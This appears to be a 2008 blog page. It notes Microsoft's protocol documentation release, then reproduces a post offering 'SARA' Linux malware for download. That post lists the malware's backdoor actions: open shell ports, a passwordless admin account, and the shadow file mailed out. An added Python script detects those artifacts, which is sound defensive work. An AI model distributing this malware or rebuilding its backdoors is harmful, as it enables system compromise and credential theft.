Monday, February 25, 2008

Microsoft started a Protocols Program

Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.

Tuesday, February 19, 2008

SARA Linux Malware

Hi all!
Today I released a basic piece of malware that exploits the vmsplice bug in the Linux kernel.
This program uses the vulnerability to install some backdoors on the system.

UPDATED
Actions:
- disables the INPUT rules on the firewall
- opens port 1407 to execute remote commands
- opens a bash session on port 14071 using the xinetd daemon
- adds an admin user without a password
- schedules malicious tasks in cron
- mails the shadow file to a mail account

Vulnerable systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz
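
Three of the actions listed above leave artifacts a defender can check for: listeners on ports 1407 and 14071, an xinetd service that runs a shell, and an admin account with an empty password. The following is an added example, not part of the original post or of the released program. It assumes "admin user" means a UID 0 account and that the xinetd service points `server` directly at a shell, and every sample input in it is constructed.

```python
import re

BACKDOOR_PORTS = {1407, 14071}    # listener ports named in the post
SHELLS = {"/bin/sh", "/bin/bash"}  # assumption: usual shell paths

def empty_password_admins(passwd_text, shadow_text):
    """UID-0 accounts (assumed meaning of 'admin user') with an empty password field."""
    uid0 = {f[0] for f in (l.split(":") for l in passwd_text.splitlines())
            if len(f) >= 3 and f[2] == "0"}
    return sorted(f[0] for f in (l.split(":") for l in shadow_text.splitlines())
                  if len(f) >= 2 and f[0] in uid0 and f[1] == "")

def listening_backdoor_ports(ss_output):
    """Ports from BACKDOOR_PORTS that appear as listeners in `ss -ltn` output."""
    found = set()
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) >= 4 and cols[0] == "LISTEN":
            port = cols[3].rsplit(":", 1)[-1]  # also handles [::]:1407
            if port.isdigit() and int(port) in BACKDOOR_PORTS:
                found.add(int(port))
    return sorted(found)

def xinetd_shell_services(conf_text):
    """Names of xinetd services whose `server` attribute is a shell binary."""
    hits, name = [], None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        svc = re.match(r"service\s+(\S+)", line)
        srv = re.match(r"server\s*=\s*(\S+)", line)  # does not match server_args
        if svc:
            name = svc.group(1)
        elif srv and name and srv.group(1) in SHELLS:
            hits.append(name)
    return hits

# Constructed sample inputs, not taken from a real host.
PASSWD = "root:x:0:0:root:/root:/bin/bash\nsvc:x:0:0::/:/bin/bash\nbob:x:1000:1000::/home/bob:/bin/bash\n"
SHADOW = "root:$1$salt$hash:13930:0:99999:7:::\nsvc::13930:0:99999:7:::\nbob::13930:0:99999:7:::\n"
SS = ("State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
      "LISTEN 0      128    0.0.0.0:22         0.0.0.0:*\n"
      "LISTEN 0      64     0.0.0.0:14071      0.0.0.0:*\n"
      "LISTEN 0      5      [::]:1407          [::]:*\n")
XINETD = "service shell-alt\n{\n    port = 14071\n    server = /bin/bash\n    server_args = -i\n}\n"

if __name__ == "__main__":
    print("empty-password UID 0:", empty_password_admins(PASSWD, SHADOW))
    print("listeners:", listening_backdoor_ports(SS))
    print("xinetd shell services:", xinetd_shell_services(XINETD))
```

On a live host the same functions can be fed the contents of `/etc/passwd`, `/etc/shadow`, the files under `/etc/xinetd.d/`, and the output of `ss -ltn`.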